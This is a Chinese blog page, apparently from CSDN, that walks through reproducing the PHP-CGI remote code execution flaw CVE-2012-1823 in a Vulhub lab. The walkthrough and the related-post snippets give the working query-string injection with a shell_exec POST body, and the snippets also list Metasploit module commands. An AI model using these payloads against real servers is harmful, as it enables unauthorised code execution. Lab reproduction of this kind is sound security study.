CVE-2012-1823(PHP-CGI远程代码执行)

最新推荐文章于 2025-07-17 09:00:00 发布
原创 最新推荐文章于 2025-07-17 09:00:00 发布 · 5k 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#CVE-2012-1823

本文详细介绍如何基于Vulhub环境启动并复现CVE-2012-1823漏洞,包括利用特定参数进行攻击演示,如通过-s显示源码和使用-d执行命令等技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

基于vulhub漏洞环境:

安装vulhub漏洞环境
https://blog.youkuaiyun.com/qq_36374896/article/details/84102101

  • CGI模式下的参数:
    • -c 指定php.ini文件的位置
    • -n 不要加载php.ini文件
    • -d 指定配置项
    • -b 启动fastcgi进程
    • -s 显示文件源码
    • -T 执行指定次该文件
    • -h和-? 显示帮助

1.启动漏洞环境

进入 CVE-2012-1823
启动

sudo docker-compose up

在这里插入图片描述
查看正在运行的docker容器

docker ps

在这里插入图片描述
访问一下,没问题
在这里插入图片描述

2.-s显示源码

在这里插入图片描述

3.-d执行命令

?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input

<?php echo shell_exec('id');?>

用burp抓包修改包(这里要请求方式要改为POST,我截图的时候忘记改了)
在这里插入图片描述

返回结果

在这里插入图片描述

CVE-2012-2311 使用空白符加-的方式绕过检查。

CVE-2012-1823PHP-CGI远程代码执行漏洞
weixin_45253622的博客
05-20 1561
漏洞原理 php-cgi是一个类似于消息的“传递者”,它接收web容器收到的http数据包,并把里面的数据交给PHP解释器执行。 php-cgi有两个功能,一是提供cgi方式的交互,二是提供fastcgi方式的交互。 cgi方式:web容器接收到http数据包后,拿到用户请求的文件(cgi脚本),并fork除一个子进程(解释器)去执行这个文件,然后拿到执行结果,直接返回给用户,然后子进程结束,但是这个cgi模式不能接收同时接收大量的请求,因为创建进程的时候会消耗服务器资源,资源也不是无限的,所以有了
PHP-CGI Windows平台远程代码执行漏洞(CVE-2024-4577)
李同學的安全圈
06-11 2836
PHP 在设计时忽略 Windows 中对字符转换的Best-Fit 特性,当 PHP-CGI 运行在Window平台且使用了如下语系(简体中文936/繁体中文950/日文932等)时,攻击者可构造恶意请求绕过 CVE-2012-1823 补丁,从而可在无需登陆的情况下执行任意PHP代码。
PHP CGI漏洞利用(CVE-2012-1823
最新发布
m0_62908421的博客
07-17 895
摘要: CVE-2012-1823PHP-CGI模式下的高危RCE漏洞,影响PHP 5.0.0至5.3.11及5.4.0至5.4.1版本。漏洞源于PHP-CGI错误地将HTTP查询字符串解析为命令行参数(如-d、-s),导致攻击者通过构造恶意参数(如-d allow_url_include=on)动态修改配置并执行任意代码。典型利用链包括通过auto_prepend_file加载恶意输入流(如php://input)。Metasploit提供自动化攻击模块,后续还出现绕过补丁的变种。
CVE-2012-1823
qq_53063436的博客
01-05 2240
CVE-2012-1823详细介绍 漏洞复现(靶场为ctfshow) 利用 http://url/index.php?-s 判断是否存在漏洞 若出现源码组存在 bp抓包按下面修改 POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1 Host: example.com Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (co
漏洞复现之CVE-2012-1823PHP-CGI远程代码执行
ASD830的博客
06-18 866
发现flag,查看即可得到flag{32a52c19-c1db-4479-ac54-ab59d8d45977}可以发现其php版本为5.4.1,而且可以看到一个cve字样:cve20121823。得到index.php和info.php,使用cat命令查看一下index.php。提示我们这里没什么东西,我们猜测flag可能在根目录下,目录穿越一下。接着我们使用-d 指定配置项,这里我们可以结合post请求执行命令。发现info.php,直接访问/info.php。首先我们使用-s命令查看一下源代码。
[Vulfocus解题系列] phpcgi 代码执行 (CVE-2012-1823)
00勇士王子的博客
07-09 786
漏洞介绍 名称: phpcgi 代码执行 (CVE-2012-1823) 描述: CGI全称是“通用网关接口”(Common Gateway Interface), 它可以让一个客户端,从网页浏览器向执行在Web服务器上的程序请求数据 这个漏洞简单来说,就是用户请求的querystring(querystring字面上的意思就是查询字符串,一般是对http请求所带的数据进行解析,这里也是只http请求中所带的数据)被作为了php-cgi的参数,最终导致了一系列结果。 解题过程 1.打开靶场环境 2.访问i
PHP-CGI远程代码执行漏洞(CVE-2012-1823
orchid_sea的博客
07-19 2798
在启动docker容器时,提示ServerName错误。将配置文件从容器中复制出来修改,再复制回去。将ServerName位置添加所需IP。检查一下是否修改成功。
[vulhub]:CVE-2012-1823 php-cgi远程代码执行
qq_43756450的博客
02-28 539
[vulhub]:CVE-2012-1823 php-cgi远程代码执行 Author:badbird Time:2020-2-6 该漏洞只出现在以cgi模式运行的php中。影响范围 < 5.3.12 < 5.4.2 0x01 预备知识 ​ 什么是CGI? ​ Common Gateway Interface 即“通用网关接口”。用于处理浏览器(客户端)向服务器发送的数据,在服务器上部署。CGI实际上是一种数据处理的协议,相当于Web服务器“背后的女人”。 ​ CGI做了什么工作?
CVE-2024-4577】PHP CGI 远程代码执行漏洞
qq_21039641的博客
06-08 2475
PHP 语言在设计时忽略Windows 作业系统内部对字元编码转换的Best-Fit特性,导致未认证的攻击者可透过特定的字元序列绕过旧有。的保护,透过参数注入等攻击在远端PHP 服务器上执行任意代码。
CVE-2012-1823漏洞与嚣张的黑客
m0_65129142的博客
12-18 827
【1】初见端倪 某日,在我司技术人员的日常巡检过程中发现有一个客户现场的聚铭网络流量智能分析审计系统(iNFA)报出“疑似存在 CVE-2012-1823攻击尝试”的安全事件,于是立即要求相关技术人员抓取流量数据包,以便对本次疑似攻击事件进行分析和判定。 本文内容主要对该次攻击事件涉及的分析思路和相关技术进行分享,现场抓取的数据包内容如下图所示(敏感数据已进行脱敏处理)。 图1 攻击的相关数据 从数据的请求数据中可以发现几个可疑的点,应该重点关注和分析,或许能找到一些有用的线索。 URL部分: /?-
漏洞复现之CVE-2012-1823
2202_75658977的博客
03-19 666
usr/local/bin/php-cgi -d include_path=/path`的方式传入php-cgi,更可以通过querystring的方式传入。/usr/local/bin/php-cgi -d include_path=/path`的写法来进行测试,认为不应该限制php-cgi接受命令行参数,而且这个功能不和其他代码有任何冲突。- `-c` 指定php.ini文件的位置。- `-h`和`-?
CVE-2012-1823PHP-CGI远程代码执行漏洞(80端口)
m0_62670778的博客
05-12 943
php-cgi是一个类似于消息的“传递者”,它接收web容器收到的http数据包,并把里面的数据交给PHP解释器执行php-cgi有两个功能,一是提供cgi方式的交互,二是提供fastcgi方式的交互cgi方式:web容器接收到http数据包后,拿到用户请求的文件(cgi脚本),并fork除一个子进程(解释器)去执行这个文件,然后拿到执行结果,直接返回给用户,然后子进程结束,但是这个cgi模式不能接收同时接收大量的请求,因为创建进程的时候会消耗服务器资源,资源也不是无限的,所以有了fastcgi
CVE-2012-1823 php-cgi漏洞 metasploit利用脚本
收集盒 Book box
07-11 1621
> use exploit/multi/http/php_cgi_arg_injection > set rhost IP > set PAYLOAD php/meterpreter/bind_tcp > exploit
CVE-2012-1823 php-cgi远程代码执行
cnbird's blog
12-22 2548
CVE-2012-1823php-cgi远程代码执行,FastCGI不受影响。PHP官方暂时未发布补丁,请受影响的站长按文章下方提供的方式打好临时补丁。 http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/ via:knownsec POC: 1、本地包含直接执行代码: curl -H "USER-AGENT: " h
PHP-CGI远程代码执行漏洞CVE-2012-1823复现
从不专注的人的博客
06-17 1534
目录CVE-2012-1823漏洞原因影响版本漏洞利用cgi模式下的参数开启实验环境访问网站制造漏洞执行代码移除漏洞环境 CVE-2012-1823 漏洞原因 用户请求的querystring被作为了php-cgi的参数执行了,命令行参数不仅可以通过#!/usr/local/bin/php-cgi -d include_path=/path的方式传入php-cgi,还可以通过querystring的方式传入。 影响版本 < php-5.3.12 or php < 5.4.2 mod方式、fpm方
CVE-2012-1823:phpcgi 代码执行
Foreverlove112的博客
11-08 1257
CVE-2012-1823:phpcgi 代码执行
CVE-2012-1823php 5.3.29的漏洞吗
03-25
<think>嗯,用户现在问的是CVE-2012-1823是否是PHP 5.3.29的漏洞。我需要先确认这个CVE的具体信息。之前用户问过PHP 5.3.29的安全漏洞,我列出了几个,但当时没有提到CVE-2012-1823,所以用户可能是在进一步确认或者发现了新的信息。 首先,我应该回忆一下CVE-2012-1823是什么。根据记忆,这个漏洞涉及到PHPCGI模式下的参数注入问题,特别是当PHPCGI方式运行时,攻击者可以通过查询字符串注入参数,导致执行任意代码。比如,在URL中添加?-s可能会泄露源代码,或者?-d指定配置导致远程代码执行。 然后需要确定PHP 5.3.29是否受此漏洞影响。根据CVE的发布时间,2012年,而PHP 5.3.29是2014年发布的,所以理论上这个版本可能已经修复了该漏洞。但需要具体查看PHP的版本修复情况。通常,CVE-2012-1823PHP 5.3.12和5.4.2中已经修复,所以如果5.3.29是后续版本,应该已经包含修复补丁。 不过,用户之前的问题中提到PHP 5.3.29没有修复某些漏洞,比如CVE-2014-0185等,可能因为PHP 5.3分支在某个时间点之后停止维护,但CVE-2012-1823的修复是在更早的版本,所以需要明确PHP 5.3.29是否在修复的版本之后。 需要查阅官方资料确认。PHP 5.3.29是5.3系列的最后一个版本,发布于2014年8月,而CVE-2012-1823的修复版本是5.3.12和5.4.2,这两个版本都比5.3.29早,所以5.3.29应该已经包含了该漏洞的补丁。因此,CVE-2012-1823并不影响PHP 5.3.29。 但是用户可能混淆了版本,或者可能使用的环境有其他因素,比如服务器配置导致漏洞仍然存在。比如,如果服务器未正确配置,或者使用了不受支持的旧组件,可能存在风险。但根据PHP版本本身,5.3.29已经修复了这个漏洞。 需要确认用户的意图,可能他们正在处理一个使用5.3.29的系统,并发现了CVE-2012-1823的报告,担心是否存在风险。需要明确回答漏洞是否存在,并给出建议,即使已修复,但5.3.29本身已过时,应升级到更高版本。 另外,用户可能是在测试漏洞,需要了解如何验证他们的PHP版本是否受影响,所以可以补充检测方法,比如查看PHP版本是否低于修复版本,或者检查服务器配置。 总结回答结构:首先明确回答CVE-2012-1823是否影响5.3.29,然后解释漏洞细节,说明修复版本,最后给出建议。</think>### **CVE-2012-1823PHP 5.3.29 的关系** #### **1. 漏洞归属** - **CVE-2012-1823** 是 PHP 的一个**高危远程代码执行漏洞**,但它**并非 PHP 5.3.29 的漏洞**。 - **受影响版本**:PHP 5.3.12 之前的 **5.3.x** 系列版本,以及 PHP 5.4.2 之前的 **5.4.x** 系列版本。 - **修复版本**:PHP 5.3.12 / 5.4.2(发布于 2012 年 5 月)。 #### **2. PHP 5.3.29 的状态** - PHP 5.3.29 是 5.3.x 系列的**最终版本**(发布于 2014 年 8 月),已包含对 CVE-2012-1823 的修复。 - 因此,**PHP 5.3.29 不受 CVE-2012-1823 影响**。 --- ### **漏洞原理** - **触发条件**:PHP 以 **CGI 模式**运行(例如通过 Apache 的 `mod_cgi`)。 - **攻击方式**:攻击者通过构造恶意 URL(如 `http://example.com/index.php?-s` 或 `?-d` 注入参数),可导致: - **源代码泄露**(利用 `-s` 参数)。 - **远程代码执行**(通过 `-d` 修改 PHP 配置,例如启用 `allow_url_include` 并加载远程恶意代码)。 --- ### **验证方法** 1. **检查 PHP 版本**: ```bash php -v ``` - 若版本低于 **5.3.12** 或 **5.4.2**,则存在风险。 - PHP 5.3.29 已修复,无需担心此漏洞。 2. **服务器配置检查**: - 避免使用已弃用的 CGI 模式,改用更安全的 `mod_php`(Apache)或 PHP-FPM(Nginx)。 --- ### **注意事项** - **PHP 5.3.x 的整体风险**:尽管 5.3.29 修复了 CVE-2012-1823,但该系列已于 2014 年停止支持,存在其他未修复漏洞(如 [Ghost 漏洞](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0235) 和 SSL/TLS 协议缺陷)。 - **升级建议**:**立即迁移**至 PHP 7.4+ 或 8.x 长期支持版本,并更新关联依赖库(如 OpenSSL)。 如需进一步排查或迁移方案,可提供服务器环境详情。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值